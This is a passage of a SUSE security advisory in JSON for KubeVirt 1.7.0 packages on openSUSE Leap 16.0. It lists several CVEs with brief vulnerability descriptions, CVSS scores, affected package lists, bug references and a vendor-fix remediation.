"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
